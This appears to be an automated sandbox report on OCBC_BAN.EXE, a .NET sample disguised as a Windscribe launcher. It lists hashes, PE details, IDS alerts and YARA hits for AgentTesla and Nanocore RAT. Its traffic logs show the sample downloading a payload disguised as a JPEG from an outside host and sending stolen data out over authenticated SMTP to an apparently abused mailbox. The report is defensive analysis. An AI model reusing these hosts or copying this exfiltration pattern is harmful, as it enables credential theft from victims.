Process:	C:\Users\user\Desktop\OCBC_BAN.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	4.239777799948537
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	OCBC_BAN.EXE
File size:	25088
MD5:	be7bb1d25f6fb1b424ab8b54dc3971d0
SHA1:	73e4dcb20a351f5d7332ac2383fce657f22906b2
SHA256:	353fb33f1ee908da348b403a829f36ad6f6bd0aa3022bc56f0542f9197266b20
SHA512:	2b637eddaf731e348064e4cf61f3c8db9888e52c75141de89f157102385da300cc7439e5029ce80551bffa51261e33a82ed1a5ab2bc2c7ef16f97788b6699ec8
SSDEEP:	192:M+fFPxnDgmvb3J7uyDTIJ1/DWzFCOmNEvNesGGE/:dfFO2rJ6yDMJ1/i0SvNesI
TLSH:	04B29401F544C3B0E3A5167778DDB18CE2AE9C2D121BAA9AF4907D5C1A722C11EF687C
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....yb.....................L.......3... ........@.. ....................................@................................

File Icon


Icon Hash:	66e4c8dae0ccd4d6

Static PE Info

General

Entrypoint:	0x40338e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x6279C785 [Tue May 10 02:01:41 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x333c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4000	0x4a00	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1394	0x1400	False	0.5751953125	data	5.58241823662	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x4000	0x4a00	0x4a00	False	0.142630912162	data	3.57733533525	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xa000	0xc	0x200	False	0.044921875	data	0.0815394123432	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x4130	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
RT_GROUP_ICON	0x8358	0x14	data
RT_VERSION	0x836c	0x3ae	data
RT_MANIFEST	0x871c	0x1b4	XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright (C) 2021 Windscribe Limited
Assembly Version	2.0.3.16
InternalName	Waxhxbwa.exe
FileVersion	2.0.3.16
CompanyName	Windscribe Limited
LegalTrademarks
Comments	Windscribe Launcher
ProductName	Windscribe
ProductVersion	2.0.3.16
FileDescription	Windscribe Launcher
OriginalFilename	Waxhxbwa.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
103.8.79.204192.168.2.680497372848901 05/10/22-14:47:14.568526	TCP	2848901	ETPRO TROJAN Observed Reversed EXE String Inbound (This Program...)	80	49737	103.8.79.204	192.168.2.6
192.168.2.6200.40.119.50497865872030171 05/10/22-14:48:16.817585	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49786	587	192.168.2.6	200.40.119.50

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 10, 2022 14:47:11.899657011 CEST	49737	80	192.168.2.6	103.8.79.204
May 10, 2022 14:47:12.075635910 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.075766087 CEST	49737	80	192.168.2.6	103.8.79.204
May 10, 2022 14:47:12.076750040 CEST	49737	80	192.168.2.6	103.8.79.204
May 10, 2022 14:47:12.252244949 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.252577066 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.252599955 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.252616882 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.252634048 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.252684116 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.252707005 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.252724886 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.252743006 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.252744913 CEST	49737	80	192.168.2.6	103.8.79.204
May 10, 2022 14:47:12.252804995 CEST	49737	80	192.168.2.6	103.8.79.204
May 10, 2022 14:47:12.252835035 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.252852917 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.252943993 CEST	49737	80	192.168.2.6	103.8.79.204
May 10, 2022 14:47:12.428878069 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.428913116 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.428930998 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.428949118 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.428966045 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.428982019 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.429002047 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.429016113 CEST	49737	80	192.168.2.6	103.8.79.204
May 10, 2022 14:47:12.429020882 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.429039955 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.429055929 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.429070950 CEST	49737	80	192.168.2.6	103.8.79.204
May 10, 2022 14:47:12.429075003 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.429092884 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.429110050 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.429126978 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.429132938 CEST	49737	80	192.168.2.6	103.8.79.204
May 10, 2022 14:47:12.429146051 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.429163933 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.429172039 CEST	49737	80	192.168.2.6	103.8.79.204
May 10, 2022 14:47:12.429182053 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.429194927 CEST	49737	80	192.168.2.6	103.8.79.204
May 10, 2022 14:47:12.429200888 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.429219007 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.429227114 CEST	49737	80	192.168.2.6	103.8.79.204
May 10, 2022 14:47:12.429239988 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.429250956 CEST	49737	80	192.168.2.6	103.8.79.204
May 10, 2022 14:47:12.429311037 CEST	49737	80	192.168.2.6	103.8.79.204
May 10, 2022 14:47:12.605308056 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.605350971 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.605377913 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.605406046 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.605423927 CEST	49737	80	192.168.2.6	103.8.79.204
May 10, 2022 14:47:12.605433941 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.605462074 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.605490923 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.605505943 CEST	49737	80	192.168.2.6	103.8.79.204
May 10, 2022 14:47:12.605516911 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.605544090 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.605552912 CEST	49737	80	192.168.2.6	103.8.79.204
May 10, 2022 14:47:12.605571032 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.605576038 CEST	49737	80	192.168.2.6	103.8.79.204
May 10, 2022 14:47:12.605597019 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.605619907 CEST	49737	80	192.168.2.6	103.8.79.204
May 10, 2022 14:47:12.605623960 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.605652094 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.605668068 CEST	49737	80	192.168.2.6	103.8.79.204
May 10, 2022 14:47:12.605679035 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.605705976 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.605725050 CEST	49737	80	192.168.2.6	103.8.79.204
May 10, 2022 14:47:12.605732918 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.605772018 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.605781078 CEST	49737	80	192.168.2.6	103.8.79.204
May 10, 2022 14:47:12.605811119 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.605846882 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.605859995 CEST	49737	80	192.168.2.6	103.8.79.204
May 10, 2022 14:47:12.605875015 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.605904102 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.605921030 CEST	49737	80	192.168.2.6	103.8.79.204
May 10, 2022 14:47:12.605928898 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.605957031 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.605971098 CEST	49737	80	192.168.2.6	103.8.79.204
May 10, 2022 14:47:12.605986118 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.606021881 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.606031895 CEST	49737	80	192.168.2.6	103.8.79.204
May 10, 2022 14:47:12.606060982 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.606091022 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.606108904 CEST	49737	80	192.168.2.6	103.8.79.204
May 10, 2022 14:47:12.606122017 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.606157064 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.606168985 CEST	49737	80	192.168.2.6	103.8.79.204
May 10, 2022 14:47:12.606194019 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.606235027 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.606237888 CEST	49737	80	192.168.2.6	103.8.79.204
May 10, 2022 14:47:12.606273890 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.606309891 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.606317043 CEST	49737	80	192.168.2.6	103.8.79.204
May 10, 2022 14:47:12.606348038 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.606378078 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.606399059 CEST	49737	80	192.168.2.6	103.8.79.204
May 10, 2022 14:47:12.606405020 CEST	80	49737	103.8.79.204	192.168.2.6
May 10, 2022 14:47:12.606431961 CEST	80	49737	103.8.79.204	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 10, 2022 14:47:11.856347084 CEST	60350	53	192.168.2.6	8.8.8.8
May 10, 2022 14:47:11.875746965 CEST	53	60350	8.8.8.8	192.168.2.6
May 10, 2022 14:48:13.015645981 CEST	51666	53	192.168.2.6	8.8.8.8
May 10, 2022 14:48:13.511332989 CEST	53	51666	8.8.8.8	192.168.2.6
May 10, 2022 14:48:13.587321043 CEST	57037	53	192.168.2.6	8.8.8.8
May 10, 2022 14:48:13.845794916 CEST	53	57037	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 10, 2022 14:47:11.856347084 CEST	192.168.2.6	8.8.8.8	0x1787	Standard query (0)	bmn.lpmpbanten.id	A (IP address)	IN (0x0001)
May 10, 2022 14:48:13.015645981 CEST	192.168.2.6	8.8.8.8	0xa0a1	Standard query (0)	mail.elparque.com.uy	A (IP address)	IN (0x0001)
May 10, 2022 14:48:13.587321043 CEST	192.168.2.6	8.8.8.8	0x5ac0	Standard query (0)	mail.elparque.com.uy	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 10, 2022 14:47:11.875746965 CEST	8.8.8.8	192.168.2.6	0x1787	No error (0)	bmn.lpmpbanten.id		103.8.79.204	A (IP address)	IN (0x0001)
May 10, 2022 14:48:13.511332989 CEST	8.8.8.8	192.168.2.6	0xa0a1	No error (0)	mail.elparque.com.uy	mx.mf.netgate.com.uy		CNAME (Canonical name)	IN (0x0001)
May 10, 2022 14:48:13.511332989 CEST	8.8.8.8	192.168.2.6	0xa0a1	No error (0)	mx.mf.netgate.com.uy		200.40.119.50	A (IP address)	IN (0x0001)
May 10, 2022 14:48:13.845794916 CEST	8.8.8.8	192.168.2.6	0x5ac0	No error (0)	mail.elparque.com.uy	mx.mf.netgate.com.uy		CNAME (Canonical name)	IN (0x0001)
May 10, 2022 14:48:13.845794916 CEST	8.8.8.8	192.168.2.6	0x5ac0	No error (0)	mx.mf.netgate.com.uy		200.40.119.50	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

bmn.lpmpbanten.id

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49737	103.8.79.204	80	C:\Users\user\Desktop\OCBC_BAN.EXE

Timestamp	kBytes transferred	Direction	Data
May 10, 2022 14:47:12.076750040 CEST	222	OUT	GET /fint/Waxhxbwa_Ytgbplyy.jpg HTTP/1.1 Host: bmn.lpmpbanten.id Connection: Keep-Alive
May 10, 2022 14:47:12.252577066 CEST	224	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 May 2022 12:47:12 GMT Content-Type: image/jpeg Content-Length: 1460224 Connection: keep-alive Last-Modified: Tue, 10 May 2022 02:01:19 GMT Expires: Sat, 09 Jul 2022 12:47:12 GMT Cache-Control: max-age=5184000 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Nginx-Upstream-Cache-Status: STALE X-Server-Powered-By: Engintron Accept-Ranges: bytes Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 30 00 00 00 0c 00 16 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 35 00 38 00 39 00 38 00 2e 00 35 00 36 00 31 00 38 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 20 00 79 00 6c 00 62 00 6d 00 65 00 73 00 73 00 41 00 01 00 0e 00 44 00 00 00 35 00 38 00 39 00 38 00 2e 00 35 00 36 00 31 00 38 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 0e 00 40 00 00 00 00 00 00 00 00 00 65 00 6d 00 61 00 4e 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 01 00 22 00 00 00 6c 00 6c 00 64 00 2e 00 69 00 66 00 64 00 76 00 67 00 6d 00 77 00 68 00 69 00 61 00 65 00 76 00 62 00 6d 00 75 00 70 00 75 00 73 00 43 00 00 00 65 00 6d 00 61 00 6e 00 65 00 6c 00 69 00 46 00 6c 00 61 00 6e 00 69 00 67 00 69 00 72 00 4f 00 01 00 18 00 58 00 00 00 00 00 00 00 00 00 73 00 6b 00 72 00 61 00 6d 00 65 Data Ascii: >0P5898.5618.0.1noisreV ylbmessAD5898.5618.0.1noisreVtcudorP@emaNtcudorP"lld.ifdvgmwhiaevbmupusCemaneliFlanigirOXskrame

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
May 10, 2022 14:48:15.159502029 CEST	587	49786	200.40.119.50	192.168.2.6	220 correo.netgate.com.uy ESMTP NETGATE_S.A
May 10, 2022 14:48:15.159888029 CEST	49786	587	192.168.2.6	200.40.119.50	EHLO 980108
May 10, 2022 14:48:15.415002108 CEST	587	49786	200.40.119.50	192.168.2.6	250-correo.netgate.com.uy 250-PIPELINING 250-SIZE 52428800 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 DSN
May 10, 2022 14:48:15.416372061 CEST	49786	587	192.168.2.6	200.40.119.50	AUTH login aW5mb0BlbHBhcnF1ZS5jb20udXk=
May 10, 2022 14:48:15.672071934 CEST	587	49786	200.40.119.50	192.168.2.6	334 UGFzc3dvcmQ6
May 10, 2022 14:48:15.929456949 CEST	587	49786	200.40.119.50	192.168.2.6	235 2.7.0 Authentication successful
May 10, 2022 14:48:15.933407068 CEST	49786	587	192.168.2.6	200.40.119.50	MAIL FROM:<info@elparque.com.uy>
May 10, 2022 14:48:16.188899994 CEST	587	49786	200.40.119.50	192.168.2.6	250 2.1.0 Ok
May 10, 2022 14:48:16.192569017 CEST	49786	587	192.168.2.6	200.40.119.50	RCPT TO:<contacto@filtrosdys.com>
May 10, 2022 14:48:16.559595108 CEST	587	49786	200.40.119.50	192.168.2.6	250 2.1.5 Ok
May 10, 2022 14:48:16.559954882 CEST	49786	587	192.168.2.6	200.40.119.50	DATA
May 10, 2022 14:48:16.814980984 CEST	587	49786	200.40.119.50	192.168.2.6	354 End data with <CR><LF>.<CR><LF>
May 10, 2022 14:48:16.818661928 CEST	49786	587	192.168.2.6	200.40.119.50	.
May 10, 2022 14:48:17.094567060 CEST	587	49786	200.40.119.50	192.168.2.6	250 2.0.0 Ok: queued as 68DC22A598C
May 10, 2022 14:49:17.154443026 CEST	587	49786	200.40.119.50	192.168.2.6	421 4.4.2 correo.netgate.com.uy Error: timeout exceeded

Target ID:	0
Start time:	14:47:09
Start date:	10/05/2022
Path:	C:\Users\user\Desktop\OCBC_BAN.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\OCBC_BAN.EXE"
Imagebase:	0x820000
File size:	25088 bytes
MD5 hash:	BE7BB1D25F6FB1B424AB8B54DC3971D0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000003.497174960.000000000A803000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000003.497174960.000000000A803000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.536986787.0000000003C93000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.536986787.0000000003C93000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000002.536986787.0000000003C93000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000003.497125933.000000000A7AC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000003.497125933.000000000A7AC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.536754919.0000000003B99000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.536754919.0000000003B99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000002.536754919.0000000003B99000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.536084808.0000000002C9D000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: NanoCore, Description: unknown, Source: 00000000.00000002.536084808.0000000002C9D000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.536198846.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.536198846.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.537196889.0000000003D32000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.537196889.0000000003D32000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000002.537196889.0000000003D32000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Analysis Process: cmd.exePID: 3616, Parent PID: 4500

General

Target ID:	5
Start time:	14:47:41
Start date:	10/05/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c timeout 10
Imagebase:	0xed0000
